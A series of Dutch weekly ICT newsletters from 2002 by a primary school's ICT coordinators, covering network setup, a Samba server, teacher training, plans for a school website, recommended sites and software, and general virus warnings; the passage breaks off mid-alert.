Hoe kan het ook anders: Kennisnet werd door bijna alle leerkrachten genoemd. Vaak is het vooral de belofte van Kennisnet die de harten sneller doet kloppen: veel scholen hebben hoge verwachtingen, maar wachten nog op servers, kabels of feitelijke aansluiting. De leerkrachten die al wel met Kennisnet werken zijn vooral enthousiast over de Programmamatrix en de Kringen.

2. Taptoe Spreekbeurtensite (www.taptoe.nl) is vooral bij de leerlingen heel populair, voor hun werkstukken en spreekbeurten.

3. Schooltelevisie (www.teleacnot.nl)

Veel scholen kijken naar het Weekjournaal en naar Nieuws uit de natuur, en de websites sluiten daar prima bij aan.

4. De Startpagina (www.startpagina.nl) en haar dochters: de PABO-pagina, de ADHD-pagina, de Dyslexiepagina, de Onderwijspagina, de Basisonderwijspagina, en zo kunnen we nog wel even doorgaan. Stuk voor stuk handige, goed bijgehouden portals.

5. De digitale school (www.digischool.nl): geliefd als ideeënbron.

Software

Veel leerkrachten hebben nogal wat te mopperen over de beschikbare educatieve software. Te duur, niet interactief genoeg, gehannes met licenties, niet geschikt voor netwerken - er wordt veel geklaagd. Toch maken nagenoeg alle geïnterviewde scholen veelvuldig gebruik van educatieve programma’s:

 1. Wereld in Getallen Een standaardmethode, die vooral wordt gewaardeerd om de feedback die leerlingen van het programma krijgen.

 2. Veilig Leren Lezen. Voor remedial teaching en NT2-onderwijs wordt het programma 'Veilig leren lezen in stapjes' veel genoemd.

 3. De software van Ambrasoft, voor rekenen en taal. Deze programma's worden minder genoemd dan de bovenstaande programma’s, maar leerkrachten die deze programma’s gebruiken zijn unaniem laaiend enthousiast.

 4. Schatkist is voor kleuters een gewaardeerde taalmethode.

 5. Programma’s van het NIB worden vooruitstrevend genoemd. Vooral Luister Maar en Taalplan (dat nu wordt uitgegeven door Dodo Software) zijn populair.

Kijk voor de volledige lijst op de Maki-site. (!!!!!!!!! doen!!!!)

2002-03-01 w09

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 9 - 2002 1 maart 2002
Waar zijn we de afgelopen week op ICT gebied mee bezig geweest?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Lekkage.

Het noodweer deze week heeft ertoe geleid, dat in ons heiligdom, het magazijntje waar de servers staan en alle netwerkkabels door de school verspreid worden, water heeft gelekt. Eén monitor en een toetsenbord total loss. We hebben snel een noodstroomvoorziening aangelegd en alles draait gelukkig nog. Op het dak van de school ligt een bedekking die al op verscheidene plekken niet goed is gebleken en al heel wat schade heeft veroorzaakt.

Computers Basiseducatie.

Deze week werd onze school gebeld, dat de computers van de basiseducatie zouden worden opgehaald ter vernietiging. Daar heeft Dirk meteen een stokje voor gestoken: als ze toch weggegooid worden mogen wij ze dan hebben? Dat was goed. Ook de andere scholen die daar computers van hebben staan hebben ze gehouden. De onze bleken een pentium 133 en een pentium 200 te zijn. Weliswaar zonder geluidskaart en cd-rom speler, maar met een netwerkkaart. Veel te goed dus om naar de vuilstort te gaan. Volgens de leerkracht van de basiseducatie waren die computers een geschenk van Adelmund, maar zonder geluidskaart nutteloos voor het doel. Wij zetten de P200 een CD speler (kopen we) en geluidskaart (hebben we nog, evenals boxjes) . De andere wordt kantoorcomputer.

Krukken.

In onze bovenhal staan zes computers om op te tekstverwerken en internetten (geen geluid en cd rom) Die staan op hoge tafels. Nu zijn we op zoek naar in hoogte verstelbare krukken, waar je ook je voeten goed op kwijt kunt, omdat aan deze computers kinderen van allerlei verschillende lengtes moeten werken. In diverse catalogi wat gevonden, maar nog niet helemaal wat we zoeken. Hebben jullie krukken die bevallen?

Samba.

Op de nascholingscursus voor de bovenbouw is er een opdracht: hoe sla je per kind de gemaakte taalles op?

Die vraag heeft ertoe geleid, dat Dirk nu een file-server gemaakt heeft. Dit is natuurlijk geen Microsoft server, maar één op basis van Unix (samba dus). Nu nog uitzoeken hoe die het beste ingericht kan worden.

Nascholing onderbouw.

Omdat we het programma Letterpret nog niet in zijn totaliteit kunnen bekijken op het ABC, en daardoor nog geen keuze kunnen maken voor een nieuw programma voor de onderbouw, hebben we deze week “creatieve toepassingen” op de computer geprobeerd. We hebben zelf animaties gemaakt met “gif animator” en heel veel lol gehad met het bewerken van foto’s die we met een digitale camera maakten. Ook het programma Kid Pix is uitgetest en gaan we op school ook met de kinderen proberen.

Bijscholing ICT coördinator.

Deze week werd “kennisnet” weer eens onder de loep genomen. Wat kun je ermee? Bij welke scholen werkt het al? De onbetrouwbaarheid werd nog steeds als een probleem ervaren. Met onbetrouwbaarheid wordt bedoeld: er zijn momenten, dat er nauwelijks dataverkeer mogelijk is. En dat is een enorme hinderpaal bij het geven van onderwijs: als je bijvoorbeeld van 10.00 uur tot 11.00 uur met je groep een opdracht op het internet wilt uitvoeren en het lukt niet, loopt je lesschema behoorlijk in de soep.

Er zijn ook hoopgevende onderdelen: de kringen, als het blackboard in het Nederlands gaat functioneren, op de scholieren site staat een programma waarmee je een eigen webpage kunt maken, de webmail van kennisnet is misschien ook heel bruikbaar.

EHBO voor computers.

In groep 6 was de netwerkkaart stuk. Vervangen. Ook een koptelefoon in groep 5 haperde. De computertafel die daar “op proef” staat, wordt toch als te groot ervaren (80 cm diep en 1.20 meter breed)

In groep 3 werkte een monitor niet. Alle stekkers aangedrukt. Maar wat bleek: er zat ergens een schakelaartje dat verkeerd stond. Waarschijnlijk per ongeluk een tik gehad.

In een kleutergroep is een computer vervangen, maar er is nog geen software op gezet!!

Virussen.

Lees in UITLEG nr.3, 27 februari 2002, op bladzij 22: "help, een virus!" Ook daar wordt de site van www.virusalert.nl genoemd. Kijk dan ook bij http://www.virusalert.nl/?show=hoax&id=20 (sulfnbk is een hoax)

Sites:

www.hetkleineloo.nl

Deze site voor land- en tuinbouwonderwijs staat boordevol groene links. Echt de moeite waard om te bekijken voor de zaakvakken.

www.incredimail.com

Hier staat een gratis te downloaden emailprogramma. Je kunt je email vol met toeters en bellen hangen. Er komt een butler je waarschuwen, als er een nieuwe mail is binnengekomen. En als je tikt, hoor je een ouderwetse tiepmasjiene. Voor speelse tiepes een leuk geintje.

www.kennisnet.nl

De site waar alle scholen dol enthousiast over moeten zijn. Neem eens een kijkje, bij kinderen of docent.

groeten,
Karin
Dirk

2002-03-08 w10

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 10 - 2002 8 maart 2002
Waar zijn we de afgelopen week op ICT gebied mee bezig geweest?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT werkgroep.

We hebben weer een bijeenkomst met de werkgroep gehad. Voor een ICT-coördinator is het heel prettig om met een aantal collega’s door te nemen wat er gaande is en problemen te bespreken.

b.v. : mag er na schooltijd gecomputerd worden?

wat voor opbergsysteem zullen we voor de cd’s uitzoeken?

hoe zorgen we ervoor dat de vragenlijsten voor Kees Vos nog op tijd bij hem zijn?

mag er in de klas ge-emailed worden?

Verder gaan we een rooster maken om kinderen op de eerste verdieping aan hun werkstukken te laten schrijven aan de computers.

etc. etc.

Website.

Wij hebben nu nog geen professionele website. Daarom hebben wij Mark de Haan gevraagd om een offerte uit te brengen en een voorstel te doen. Over twee weken krijgen we een eerste opzet te zien en aan de hand daarvan besluiten we verder te gaan met hem.

Computercursus voor ouders.

De beginnerscursus is afgelopen en een aantal ouders is deze week gestart met een cursus voor gevorderden bij het buurthuis.

Taalles op de computer.

De opdracht voor de bovenbouw (groep 4 t/m 8) voor de computercursus is: laat de leerlingen een opdracht tekstverwerken aan de hand van de taalmethode doen. Het valt niet mee!! Ik heb het zelf gedaan. Zes kinderen uit groep 6 zuigen aandacht. Pas op de plaats is gewenst. Advies: laat één kind tegelijk de opdracht doen, in het begin.

Werkzaamheden Dirk.

Dirk had een drukke computerweek, maar niet direct voor de OBSRB.

Eerst op Maandag een gesprek met Kees Vos. Aan de orde kwam onder andere of er lessen te trekken zijn uit Dirk's verleden ( zie http://utopia.knoware.nl/users/schoutdi ) als het gaat om ICT in de Baarsjes. We denken van niet omdat projectmatig werken wezenlijk verschilt van 'open einde' werk (wat ICT in de Baarsjes blijkbaar is).

Ook hadden we het over succesfactoren bij ICT. De OBSRB dankt zijn succes toch vooral aan het enthousiame van de directie, de ICT coördinator en de vrijwilligers. Ze werken goed samen en zijn kritische voorstanders voor het gebruik van ICT in het basisonderwijs.

We hadden het over 'Vertaling', het programma dat door Dirk ontwikkeld is. In de komende bijeenkomst van ICT'ers in het stadsdeel zullen we er aandacht aan besteden.

Op woensdag zat Dirk op de Openbare Scholengemeenschap Bijlmer, om daar een middag door te brengen met een van de systeembeheerders.

De leerkrachten doen heel veel met ICT. Ik noem door elkaar: schooladministratie, lessen via computers, rapporten, opdrachten, etc. etc. Er staan zo'n 300 computers in de school, draaiend via een serverpark. Daarin UNIX, Linux, Solaris, Sun en Windows NT, Veel glasvezel, meerdere systeembeheerders, aansluiting op Internet via 4 Providers vanwege redundantie. Een lagere school in de Baarsjes is op ICT gebied echt simpel te runnen.. Dat is mijn bescheiden indruk van dit bezoekje. Ik had het ook nog over één van onze problemen: Onze providers, UPC en Kennisnet komen beide via de kabel binnen. Dat wil zeggen dat als er een wijkstation uitvalt (is al een keer gebeurd) we helemaal geen Internet hebben. De systeembeheerder raadde aan om Kennisnet er uit te gooien en ADSL ofzo te nemen.

Sites.

Kinderen vragen waar ze informatie voor werkstukken kunnen vinden.

Hier een aantal zoekmachines voor kinderen. Ze zijn niet allemaal door ons uitgetest.

www.netwijs.nl

http://www.explorian.com/ned/indexplo/frame.htm

http://www.recreatief.nl/Kinderen/

http://www.1stekeuze.nl/search/kinderweb/educatie/

groeten,
Karin
Dirk

2002-03-15 w11

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 11 - 2002 15 maart 2002
Waar zijn we de afgelopen week op ICT gebied mee bezig geweest?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Op het eerste gezicht zou je zeggen: niet veel. Maar nu we het opschrijven blijkt het bij nader inzien toch anders.

Karin was op haar ICT dagen ziek. Donderdag stond ze weer pipsjes voor de klas.

Dirk was de hele week bezig met het testen van de door het door de OBS Rosa Boekdrukker gefinancierde programma 'Dictee'. Volgende week horen jullie er meer over op de ICT dag.

Verder kochten wij een router om onze twee netwerken aan elkaar te verbinden. We hebben UPC en Kennisnet. Door ze te koppelen kunnen we bestanden en printers delen. We kochten voor €185.- ex BTW een prima router die o.i. alles kan.

IDEEËN GEVRAAGD VOOR SCHOOLWEBSITE.

Zoals we in de vorige BIC schreven, zijn we bezig met het ontwikkelen van ideeën voor een schoolwebsite. Deze fase bestaat uit verschillende onderdelen en denksporen. Hier zijn wat gedachten; daarna de vraag aan jullie.

- Wat verwacht je van een _effectieve_ schoolsite ?
Hier gaat het om: wat voor componenten zitten er in die een bijdrage leveren aan de doelen van je onderwijs. En zie dat ten aanzien van leerlingen, ouders, team, bestuur, etc.. Je zou kunnen denken aan webmail, chat, forum, kinderen maken zelf pagina's, online helpdesk, het team heeft apart beveiligde afdelingen (het zou niet handig zijn als een leerling toegang heeft tot de pagina waar dagelijkse mededelingen van de school op staan: "Morgen iedereen vrij!". Kortom: welke functies heeft een goede schoolwebsite?

- Hoe deel je een _efficiënte_ schoolsite in?
Hier gaat het vooral over ideeën rond de min of meer vastliggende vorm van de site. Vragen zijn hier bijvoorbeeld: welke secties kun je onderscheiden? Als je je een boomstructuur voorstelt van de site, hoe ziet die boom er dan uit? Wat voor categorieën kunnen we onderscheiden? Je kent vast wel van die sites waar je niet uitkomt en die waar je 'als vanzelf' je weg vindt. Dat komt door een goede 'boom'.

Kortom: Wat is een efficiënte schoolsite?

- Hoe zou een _mooie_ schoolsite er uit moeten zien?
Hier gaat het om hoe de eerdergenoemde items zijn uitgewerkt in een zichtbare vorm. Bijvoorbeeld: indeling van de pagina's, gebruik van kleur en vorm. Begin je met een foto van de school of juist niet. Zijn die lettertjes niet te groot/klein/mager/vet? Ja, veel kindertekening, nee, juist niet want…. Etc. etc.

Kortom: Wat is een mooie schoolsite?

Als je ideeën hebt, dan horen we die heel graag. Jouw voordeel daarbij: Het systeem dat we gaan gebruiken om de website op een eenvoudige manier bij te houden en waarmee ook kinderen 'm kunnen vullen zou voor jouw school ook wel eens handig kunnen zijn. Dat betekent dat je misschien op een voordelige manier zou kunnen meeliften. Let op: wil je je ideeën vóór eind maart aan ons kenbaar maken? Begin april zijn de begrotingsbesprekingen afgerond en gaat het werk beginnen.

VirusAlert.

Dit kwam donderdag binnen:

14 maart 2002 VirusAlert: W32.Dotjaypee@mm : "GEVAARLIJK" (38) Onderwerp: "Dotjaypee-virus"

Dotjaypee is een mass-mailer internetworm die zich verspreidt via e-mail. Indien u het bijgesloten .exe bestand opent wordt het virus geactiveerd. Na infectie stuurt het zich eenmalig door via e-mail, richting alle contactpersonen in het adressenboek van Microsoft Outlook.

Verdere acties worden door dit virus niet uitgevoerd, er worden geen bestanden op uw systeem geïnstalleerd en ook voegt het geen regels toe aan de registry. Toch verspreidt het virus zich wereldwijd razendsnel. Vooralsnog schat VirusAlert het virus op "medium risk".

zie: www.virusalert.nl

Sites.

Deze week eens wat anders: www.scholenlijst.nl Kijk eens naar wat websites van andere scholen. Wat is leuk, en wat niet? Site van de week is van een school op Aruba. Ik krijg hem alleen niet geopend.

Tot woensdag,
Karin
Dirk

2002-03-22 w12

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 12 - 2002
Wat hebben we op ICT gebied deze week gedaan?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Website.

Deze week hebben we de offerte binnen gekregen van Mark de Haan voor de nieuw te maken website en het systeem om de website bij te houden. Er moet nog het één en ander uitonderhandeld worden, maar het ziet er wel veelbelovend uit. Het zou voordelig zijn als er meer scholen in De Baarsjes mee zouden doen met dit project. Het idee is dan dat De Baarsjes het Content Management Systeem betaalt en de scholen slechts het maken van hun eigen website. Een CMS is een systeem waarmee je zelf je website kunt onderhouden en actueel houden. Met het CMS is het ook mogelijk dat kinderen direct zelf webpagina's kunnen maken en op het web zetten.

Nascholing bovenbouw.

Deze week is er weer een nascholing geweest. Het was de derde bijeenkomst waarbij tekstverwerken met de methode Taalleesland aan bod waren. Deze keer werd geëvalueerd hoe de leerkrachten met de leerlingen hadden gewerkt. Het bleek, dat hulp van de ICT coördinator nog wel nodig is bij een aantal leerkrachten om de organisatie rond te krijgen. Dus de komende week zal er geassisteerd worden bij groep 7. Op de volgende twee bijeenkomsten wordt het gebruik van internet en email in de klas behandeld. Volgende week maken we ook een afspraak met het OCA om de nascholingen voor volgend jaar te bespreken. Een integratie van klassenmanagement en ict-onderwijs lijkt zeer gewenst. Ook wordt een afspraak gemaakt voor een consult voor de Ib-er op gebied van geschikte software voor remedial teaching. Suggesties zijn welkom!

Magazijn.

We hebben nu wat ruimte gekregen in een magazijn om overtollige apparatuur op te bergen. Tot nu toe stonden monitoren en printers op plekken waar ze niet hoorden. We hebben erg opgeruimd, omdat de nieuwe rekenmethode binnen is gekomen. We hebben nu twee dozen met abacussen over: 20 kleintjes en 19 grote. Wie heeft er interesse?

ICT-bijeenkomst met De Baarsjes.

Woensdagmiddag zijn we op de 10e montessori te gast geweest voor een evaluatie en planning voor een gemeenschappelijk ICT beleid. Er is een aanzet gemaakt voor het maken van een ICT-plan. We wachten nu vol spanning af of er een financieel voorstel komt.

Software.

Deze week kregen we een cd-rom binnen van het Freudenthal instituut. Daarop staan de spelletjes die ook op hun website staan. Voor groep 3 sluiten de flitsspelletjes met vingers en rekenrek precies aan bij onze nieuwe rekenmethode. Dirk: We hebben de cd naar onze Linux server gekopieerd. Binnen 5 minuten kon de hele school rekenspelletjes doen! www.fi.uu.nl

Router

Dirk heeft de router eindelijk door en dat betekent dat we met een week ofzo van het gedoe af zijn dat je telkens van de eerste verdieping naar de tweede moet lopen voor een afdruk.

Karin
Dirk

2002-03-29 w13

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 13 - 2002
Waar zijn we de afgelopen week op ICT gebied mee bezig geweest?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Website.

We hebben ons beziggehouden met de opbouw van de toekomstige website. Op verschillende scholensites zagen wat we absoluut niet willen. Het ontwerp wordt steeds duidelijker. Website Hier is een aantal verzamelde ideeën:

PSPSPSPS Willen jullie AUB wat van je laten horen wat je goed vindt/niet goed vindt, aanvullingen of opmerkingen hebt.

Achteraf zijn zaken altijd moeizaam (dus duur) om te veranderen.

Voorbereiding studiedag.

In april hebben we op school een studiedag. Daar zal onder andere voorgesteld worden hoe we het ICT beleid voor de komende jaren gaan vormgeven. De computers moeten een geïntegreerd onderdeel van het onderwijs worden, net als boeken, schoolborden en schriften. Ze zijn een middel, geen doel. Alle aandacht zal gaan naar hoe we ze beter in kunnen zetten.

Tekstverwerken bovenbouw.

Deze week hebben 14 kinderen een lege diskette gekregen waarop ze zijn begonnen aan een werkstuk. Het was goed merkbaar, dat de lessen in het najaar op het OCA heel nuttig zijn geweest. Nu hebben we rondgelopen langs de kinderen en aanwijzingen gegeven zoals:

Het was wel nodig om steeds hulp te bieden.

Kennisnet.

Was deze week weer niet vooruit te branden. Het laden van pagina’s ging heel traaaaaaaag. De wedstrijd tussen A2000 en Kennisnet bij het bekijken van schoolsites is ruim gewonnen door A2000!!! (jammer, dat we de “poll” tussen die twee niet goed bijgehouden hebben, alhoewel….: we hebben geen precieze score bijgehouden, maar meestal was kennisnet VEEL trager).

Nascholing onderbouw.

Weer een heel ander soort bijeenkomst. Deze keer bekeken we eerst het leerkrachten gedeelte van het computerprogramma “ik reken” dat door de kleutergroepen gebruikt wordt. We zagen dat de computer helemaal bepaalt welke oefeningen een kind doet. Ook zagen we, dat er geen goede feedback voor de kinderen is. Het maken van een keuze tussen letterpret en schatkist met de muis is uitgesteld tot het programma letterpret in zijn geheel bijhet ABC is afgeleverd. Ik vrees, dat Malmberg ook traag is.

Nascholing ICT coördinator.

We hebben computers open gemaakt en bestudeerd hoe alle onderdelen aan het moederbord hangen. We hebben harde schijven verwijderd en weer aangesloten. Hartstikke leuk om het een keer te doen. Het is niet de bedoeling dat dit bij het dagelijkse werk van een ICT coördinator hoort, maar het verlaagt wel de drempel om kleine ingrepen eventueel zelf te doen.

Tijdens het sleutelen ging het gesprek o.a. over welke software kan draaien op een CIAO server? Twee leerkrachten van een CIAO school waren ten einde raad, omdat er geen reken en topografie programma's mogelijk zijn. Ook hebben we het gehad over ICT-plannen en de organisatie binnen je klas/school om de computers goed in te zetten.

sites.

www.lesidee.nl Hier staan allerlei leuke ideetjes voor lessen. Ook op de site van www.kennisnet.nl bij kids staan allerlei paasideeën. Maar daar is het nu te laat voor!!

groeten,
Karin
Dirk

2002-04-05 w14

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 14 - 2002
Waar hebben we ons de afgelopen week op ICT gebied mee bezig gehouden?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Ongemakken.

Dirk is geblesseerd. Pees door in zijn rechter middelvinger. (hoezo??? Was ie kwaad??)

Dirk: "Nee, ik liep met een glas in mijn hand tegen een glazen deur aan".

Duo partner van Karin brak haar pols waardoor de ICT werkzaamheden in de knel komen.

We vinden wel oplossingen. ICT gaat verder!!

Website voor scholen

Bezoek Ellen Warmer aan de Rosa Boekdrukker.

Dirk heeft last met zijn vinger, maar niet met zijn mond. Hij kon gelukkig Ellen nog van alles uitleggen over ons netwerk en ook het “content management systeem” dat bij onze a.s. websites hoort, uitleggen. De Baarsjes koopt het systeem en stelt het ter beschikking van iedereen. Ellen had goede suggesties; die worden meegenomen.

We vinden 'Content Management Systeem" een rotwoord. Wie weet een mooie Nederlandse term?

Vergeten bericht.

We hebben een nieuw contract afgesloten met het APS voor onze microsoft producten voor 39 computers.

Nascholing.

Het is druk op nascholingsgebied. Deze week was de bovenbouw aan de beurt voor Internet en e-mail in de klas. Deze week kwamen zoekmachines en hoe te zoeken aan de orde.

Volgende week gaan we het in de nascholing over de “veiligheid” hebben en ook het e-mailen. En dan zit de nascholing voor de bovenbouw er op.

Maar wanneer en waarom moeten kinderen Internetten? Wat moeten ze doen? Wat is nuttig?

Daarover hebben we het over twee weken in een gesprek met ABC, directie R.B. en ondergetekenden het, als we de nascholing voor volgend jaar bespreken. Ook is er op 8 april een ICT-werkgroep bijeenkomst.

Nascholing ICT coördinator.

Het sleutelen kwam goed van pas. Thuis nieuwe harde schijf ingebouwd met zoon.

Netwerken koppelen.

Hoera, eindelijk gelukt! We kunnen overal printen en onze bestanden op de Sambaserver opslaan. Alle groepen hebben al een map, gebruikers kunnen een map krijgen als ze dat willen.

Dit klusje had niet geklaard kunnen worden zonder de hulp en steun van Peter Berkhout, systeembeheerder op de Openbare Scholengemeenschap Bijlmer. Dank je wel Peter!!

Kom een keer kijken op een vrijdagmiddag, de borrel is van ons.

Sites.

Opgekregen op de nascholing:

zoekmachines voor kinderen:

www.netwijs.nl

Hier vind je ook speurtochten voor kinderen. Met zoekopdrachten op het internet. We gaan het proberen!!

www.taptoe.nl

Site voor spreekbeurten en werkstukken.

Er volgt nog een keer een discussie over: hoe maak je een werkstuk met behulp van internet? Wat mag er geprint worden, wat mag er gekopieerd en geplakt worden enzovoorts.

groeten,
Karin
Dirk

2002-04-12 w15

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 15 - 2002
Waar hebben we ons de afgelopen week op ICT gebied mee bezig gehouden?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Koppelen netwerk UPC en netwerk Kennisnet.

Het is gelukt om zowel het netwerk van de computers die aan Kennisnet zijn aangesloten, als het netwerk dat aan UPC hangt, aan te sluiten op onze SAMBA-SERVER!!! Dat betekent, dat je vanaf ALLE computers je eigen map met documenten kunt benaderen.

Er zullen nog wel meer snufjes komen.

Eerst de tijd vinden om iedereen een map te geven.

Op dit moment hebben alle groepen ieder een eigen map.

Op de tweede en eerste verdieping zijn de COMPUTERNAMEN (bijv. negenentwintig) en wachtwoorden niet meer in gebruik. Je aanmeldnaam is groepx en het wachtwoord is hetzelfde.

Binnenkort volgt de begane grond.

Rekening UPC.

Felle brief geschreven naar UPC (priority telecom) over een aanmaning. Wat een uitzoekerij: wanneer konden we ook alweer niet mailen?

In beide periodes lag het echt aan UPC en dat gaven ze ook toe: er waren problemen met de mailserver. Eén keer schreven ze een brief dat we daarom een maand niet hoefden te betalen. Een andere maand zei de man aan de helpdesk dat de problemen nog niet opgelost waren.

Het zou beter zijn om dat soort dingen in een logboekje bij te houden. Nu moest ik allemaal stapels papier en oude mailtjes doorworstelen. En de leidraad erin waren de nieuwsbrieven.

Ict werkgroep

In de werkgroep is een klein beginnetje gemaakt met de inhoud van het ICT plan. We hebben het gehad over het doel van de computers op onze school. Om tot het doel ( de computer is een verplicht hulpmiddel in ons onderwijs) te komen, gaan we verplichte computer leerstof per leerjaar uitzoeken.

We gaan o.a. kijken of “digiwijs” is in te delen in leerjaren. Daarvoor is al hulp gevraagd aan het OCA, maar moet nader worden uitgewerkt door onze werkgroep.

Briefje leerling.

Sinds een paar weken heeft een leerling uit groep 7 de taak om elke dag de computer in de hal op de 2e verdieping aan te zetten als hij op school komt, en af te sluiten, als hij weggaat. Dit, om te zorgen dat de klassen boven kunnen printen.

Deze week was hij een dag verhinderd en had een briefje neergelegd:

Karin
Dirk loopt nu met zijn arm in een mitella. De pees in zijn vinger is weer vastgemaakt. Binnenkort zal hij ermee moeten oefenen bij een fysiotherapeut. Het kan wel drie maanden duren.

Vergeten een paar weken geleden.

Het ROC dat de basiseducatie voor moeders verzorgt, wilde weten of wij onze school open willen stellen voor moeders om te leren wat onze kinderen met computers doen, welke programma’s ze gebruiken.

We hebben toen voorgesteld eens om de tafel te gaan zitten met alle betrokkenen. Ook het buurthuis, omdat daar eigenlijk de echte computercursussen voor ouders worden georganiseerd.

Nog niks nader gehoord.

Microsoft licenties.

Uit de nieuwsgroep nl.onderwijs.algemeen (bron; www.ictopschool.net):

…….e.a. heeft langer geduurd dan gepland, maar MS is volledig tegemoet gekomen aan de wens van scholen en APS en SLB om licenties voor besturingssystemen voor gebruikte pc's ter beschikking te stellen. De regeling is alleen bestemd voor primair en voortgezet onderwijs en via APS-IT-diensten en SLBdiensten te verkrijgen. In het kort betekent dit dat de basislicenties Windows 98 tweede editie voor gebruikte (gedoneerde en gekochte) pc's qua licentierechten gratis besteld kunnen worden. De betreffende pc's moeten dan wel worden aangemeld en geregistreerd via de APS- of SLB-website. De school betaalt alleen per 'order' een zeer gering bedrag aan registratiekosten waarvoor men tevens een mediaset ontvangt.

Vanaf volgende week vrijdag is er een aparte on-line registratie- en aanmeldingsprocedure voor deze regeling via onze website. DEZE REGELING IS

ABSOLUUT NIET GELDIG VOOR GEBRUIK OP NIEUWE 'KALE' PC'S. Meer informatie is te vinden bij APS en SLB. http://www.apsitdiensten.nl/index_v3.html

Nascholing.

Deze week was de laatste bijeenkomst voor de leerkrachten van de bovenbouw. Voor de tweede keer stond internet en email op het programma.

We hebben wat sites bekeken, gepraat over zoeken, en ook kwam aan de orde: wat doe je met welke leeftijd op het internet.

We zagen twee filmpjes over het gebruik van internet op ander basisscholen. Op het ene filmpje zagen we hoe een klas werkstukken maakt in een computerlokaal dat ook documentatiecentrum is (!!!) en op het andere filmpje zagen we iets over het berenproject (een emailproject) dat op de CIAO scholen wordt gedaan.

We gaan een evaluatieformulier invullen waaruit moet blijken wat er wenselijk is voor de integratie van de computers in ons onderwijs voor het volgende schooljaar.

sites.

http://www.stemwijzer.nl/

Dit is een site voor volwassenen. Na het invullen van een aantal vragen wordt berekend op welke partij je moet stemmen.

http://www.omroep.nl/nos/jeugdjournaal/index.html

De site van het jeugdjournaal heeft een educatieve aanmoedigingsprijs gewonnen.

2002-04-19 w16

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 16 - 2002
Waar hebben we ons de afgelopen week op ICT gebied mee bezig gehouden?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT handicaps.

Dirk loopt met zijn hand in een stellage met een elastiekje. De pees moet regelmatig gymmen. Gebroken pols van duopartner van Karin eist één invaldag per week. ICT op RB gaat dus niet zo snel.

Flatscreens

In de nieuwsgroep gelezen:

Ervaringen met flatscreens.

Negatief:

1. De resolutie van een flatscreen is niet te wijzigen zonder kwaliteitsverlies. Dat betekent bij oudere programma's (DOS!) en spelletjes bijvoorbeeld dat je tegen een waardeloos beeld aankijkt.

2. Een flatscreen is zeer gevoelig voor aanraking. De drukkracht op een scherm kan schade veroorzaken aan de onderliggende structuur. Maar ook het schoonmaken van zo'n scherm moet met veel zorg gebeuren.

3. Flatscreens zijn een stuk lichter dan gewone monitoren en vallen dus ook gemakkelijker om. En zijn dan meteen eerder stuk.

4. Flatscreens zijn zeer gewild, makkelijk mee te nemen en dus een gewilde prooi voor dieven en ander tuig.

5. De productie van flatscreens is nog niet helemaal onder controle. Van de tien flatscreens die wij binnenkregen (van Compaq!) waren er twee niet goed

Positief:

1. Flatscreens nemen minder ruimte in beslag op je bureau

2. Sommigen vinden flatscreens rustiger kijken. Sommigen vinden van niet. Tot voor kort mocht je (meen ik) van de Arbo niet langer dan een paar uur achter zo'n scherm zitten. Ze zijn wat verbeterd, maar mijn idee is dat dat rustige kijken vooral tussen de oren zit....

Computercursus voor ouders.

Na de Meivakantie start een computer-vervolgcursus vanuit het buurthuis. De cursus wordt op de computers op de 1e verdieping gegeven. Daar staan er 7 op een rij.

Onze Samba-server.

Het wordt nu duidelijk wat het voordeel van een file-server is. Een aantal groepen heeft nu per kind een map op de server. Door met de naam en wachtwoord van je groep in te loggen kun je op elke computer aan je documenten werken. Geen gedonder meer met diskettes, of dat je moet wachten tot je aan je “eigen” computer kunt werken.

Werkstukken groep 7.

De acht leerlingen van groep 7 uit onze 7/8 combinatie werken elke week tegelijkertijd aan hun werkstuk aan de computers in de bovenhal. Ze bereiden in de klas hun tekst voor op papier. Ik assisteer de leerkracht. Allerlei technische aanwijzingen zijn nodig:

- Komma’s en punten altijd direct achter een woord, en een spatie na dat leesteken.

- Gebruik de tabtoetsen i.p.v. allemaal spaties te zetten.

- Hoe maak je diakritische tekens zoals ë en ï.

- Spellingcontrole.

- Gebruik van de END en HOME toets

Als de teksten een beetje gevorderd zijn, gaan we plaatjes zoeken op het internet.

Voorbereiding studiedag.

Volgende week op de studiedag komt ICT ook aan de orde. Hoe kunnen we ervoor zorgen dat het computergebruik een geïntegreerd onderdeel van het lesprogramma wordt?

ICT Scholing.

We hebben deze week met Monique Korenhof van het OCA bekeken hoe we volgend jaar verder gaan met ondersteuning door het OCA. We hebben al een paar leuke ideeën. o.a. voor een aantal groepen een startles op het OCA. Ook is gesproken over hulp bij de computerintegratie. Een idee om de eigen vaardigheden van de leerkrachten te vergroten is om op gezette tijden de expertise van het OCA in de school te halen. Bijvoorbeeld elke 6 weken op maandagmiddag na schooltijd komt iemand van het OCA op school om een bepaald onderwerp te behandelen.

Virus!

Wees weer eens gewaarschuwd en neem een abonnement op een virus-waarschuwer! Stuur zelf geen mails met waarschuwingen!
===============================================
17 april 2002 VirusAlert: W32.Klez.H : "uiterst GEVAARLIJK" (53)
===============================================
Klez.H is een nieuwe variant van het al bekende W32.Klez@mm virus.
Het virus is in staat om geïnstalleerde antivirussoftware uit te schakelen
en zich te activeren door gebruik te maken van bugs in Microsoft-software.
Daarnaast verspreidt het zich zowel via e-mail als via netwerken.
Wij adviseren u z.s.m. uw antivirussoftware te updaten. De meeste
business partners van VirusAlert hebben inmiddels updates beschikbaar.
Daarnaast adviseren wij om de patches van Microsoft te installeren op uw
